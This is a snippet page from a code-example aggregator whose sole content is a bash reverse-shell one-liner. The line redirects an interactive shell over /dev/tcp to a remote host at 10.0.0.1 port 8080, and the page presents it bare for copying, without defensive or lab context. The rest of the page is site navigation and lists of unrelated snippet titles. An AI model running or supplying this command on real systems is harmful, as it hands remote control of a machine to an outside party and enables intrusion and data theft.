Menu
Newbedev LogoNEWBEDEV Python Javascript Linux Cheat sheet
Newbedev LogoNEWBEDEV
  • Python 1
  • Javascript
  • Linux
  • Cheat sheet
  • Contact

sh reverse shell script code example

Example: reverse shell bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Tags:

Shell Example

Related

draw text onto image cv2 code example proper sizing cover photo css code example mac how to install pod code example modular division in js code example how to create Ui with python code example multiple statements in foreach java 8 code example download itern zsh code example r save data to csv code example python format string to float currency code example convert object to system.Guid in C# code example node 14 npm code example nslookup to check dns code example

Recent Posts

Pandas how to find column contains a certain value Recommended way to install multiple Python versions on Ubuntu 20.04 Build super fast web scraper with Python x100 than BeautifulSoup How to convert a SQL query result to a Pandas DataFrame in Python How to write a Pandas DataFrame to a .csv file in Python
© 2021 newbedevPrivacy Policy